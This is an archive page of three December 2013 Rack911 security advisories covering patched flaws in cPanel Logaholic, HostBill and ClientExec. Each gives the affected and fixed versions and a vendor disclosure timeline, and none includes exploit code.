Archive for December, 2013

cPanel – Arbitrary File Creation (Logaholic) (R911-0100)

Wednesday, December 18th, 2013

Type: Arbitrary File Creation
Location: Remote
Impact: High
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: All versions prior to the fixed builds below.
Fixed Version: 11.40.1.3, 11.40.0.29, 11.38.2.13 & 11.36.2.10
CVE: -
R911: 0100
Date: 2013-12-18
By: Rack911

Product Description:

cPanel is an easy-to-use control panel that gives web hosts and the website owners they serve, the ability to quickly and easily manage their servers and websites. Web Host Manager (WHM) is a part of the cPanel software, often used by resellers and system administrators.

Vulnerability Description:

Logaholic session files were stored in the world-writable /tmp directory. A local attacker with access to the cPanel Logaholic interfaces could create a session file in this directory with a crafted payload intended to execute arbitrary code as the cpanel-logaholic user as the session was loaded by the Logaholic interfaces inside cPanel.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that while any file can be created as the cpanellogaholic user.

Vulnerable Version:

This vulnerability was tested against cPanel 11.40.0.9 and is believed to exist in all versions prior to the fixed builds below.

Fixed Version:

This vulnerability was patched in cPanel 11.40.1.3, 11.40.0.29, 11.38.2.13 & 11.36.2.10.

Vendor Contact Timeline:

2013-11-07: Vendor contacted via email.
2013-11-10: Vendor confirms vulnerability.
2013-12-16: Vendor issues updates to all builds.
2013-12-18: Rack911 issues security advisory.

HostBill – XSS Admin Hijack Security Vulnerability (R911-0099)

Saturday, December 14th, 2013

Type: XSS
Location: Remote
Impact: High
Product: HostBill
Website: http://www.hostbillapp.com
Vulnerable Version: 2013-12-11
Fixed Version: 2013-12-14
CVE: -
R911: 0099
Date: 2013-12-14
By: Rack911

Product Description:

Whether you resell hosting or lease colocation space – you need to bill your customers. HostBill platform’s core components are designed to help you acquire customer, automate your services and ensure that invoices are paid on time.

Vulnerability Description:

There is an XSS vulnerability present within HostBill that would allow a malicious user to obtain the admin session cookie which could then be used to hijack access to the panel.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that the admin account(s) can be hijacked.

Vulnerable Version:

This vulnerability was tested against HostBill v2013-12-11.

Fixed Version:

This vulnerability was patched in HostBill v2013-12-14.

Vendor Contact Timeline:

2013-12-13: Vendor contacted via email.
2013-12-14: Vendor confirms vulnerability.
2013-12-14: Vendor issues v2013-12-14 update.
2013-12-14: Rack911 issues security advisory.

ClientExec – Content Disclosure Vulnerability (R911-0098)

Friday, December 6th, 2013

Type: Content Disclosure
Location: Remote
Impact: Medium
Product: ClientExec
Website: http://www.clientexec.com
Vulnerable Version: 4.6.8
Fixed Version: 4.6.9
CVE: -
R911: 0098
Date: 2013-12-05
By: Rack911

Product Description:

ClientExec is a comprehensive and flexible web hosting billing solution that will help you manage and expand your existing base of hosting clients. ClientExec was conceived and built with small to mid-sized hosting companies in mind. ClientExec was built to enable business owners to effectively manage their hosting clients and web hosting billing using one convenient and powerful platform.

Vulnerability Description:

A malicious user can obtain the product details (name / domain) belonging to any other user when they submit a ticket by carefully crafting the request.

Impact:

We have deemed this vulnerability to be rated as MEDIUM due to the fact that other users information can be obtained.

Vulnerable Version:

This vulnerability was tested against ClientExec v4.6.8.

Fixed Version:

This vulnerability was patched in ClientExec v4.6.9. We thank ClientExec for their commitment to security by providing prompt updates!

Vendor Contact Timeline:

2013-12-05: Vendor contacted via email.
2013-12-05: Vendor confirms vulnerability.
2013-12-06: Vendor issues update.
2013-12-06: Rack911 issues security advisory.